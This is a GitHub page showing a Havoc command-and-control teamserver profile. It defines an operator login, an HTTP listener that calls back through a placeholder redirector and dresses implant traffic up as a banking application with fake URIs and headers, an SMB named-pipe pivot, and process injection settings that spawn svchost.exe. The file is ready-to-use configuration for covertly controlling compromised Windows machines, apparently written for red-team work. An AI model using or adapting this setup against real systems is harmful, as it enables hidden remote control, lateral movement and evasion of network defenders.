-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathhavoc.profile
78 lines (67 loc) · 2.04 KB
/
havoc.profile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
Teamserver {
Host = "0.0.0.0"
Port = 40056
Build {
Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
Nasm = "/usr/bin/nasm"
}
}
Operators {
user "neo" {
Password = "Password.less"
}
}
Listeners {
Http {
Name = "banking profile - http"
Hosts = [
"$(FRONTLINE_PUBLIC_IP_OR_DOMAIN)", # callback host - must be the frontline
]
HostBind = "0.0.0.0"
HostRotation = "round-robin"
PortBind = 80
PortConn = 80
Secure = false
KillDate = "2024-12-31 23:59:59"
UserAgent = "TestRedirection" # specific user agent - must be set on the redirector's nginx configuration
Uris = [
"/secureapp.php",
"/onlinebanking/",
]
Headers = [
"Accept: application/json",
"Referer: https://securebanking.com",
"x-ms-session-id: bank-session-id",
"x-ms-client-type: banking-app",
"x-mx-client-version: 3.0.0.20230101",
"Accept-Encoding: gzip, deflate, br",
"Origin: https://securebanking.com"
]
Response {
Headers = [
"Content-Type: application/json; charset=utf-8",
"Server: Apache/2.4.41",
"X-Content-Type-Options: nosniff",
"x-ms-environment: Banking-Production",
"x-ms-latency: 54321.9876",
"Access-Control-Allow-Origin: https://securebanking.com",
"Access-Control-Allow-Credentials: true",
"Connection: keep-alive"
]
}
}
Smb {
Name = "Pivot - Smb"
PipeName = "bank_pipe"
}
}
Demon {
Sleep = 2
Jitter = 20
TrustXForwardedFor = true
Injection {
Spawn64 = "C:\\Windows\\System32\\svchost.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\svchost.exe"
}
}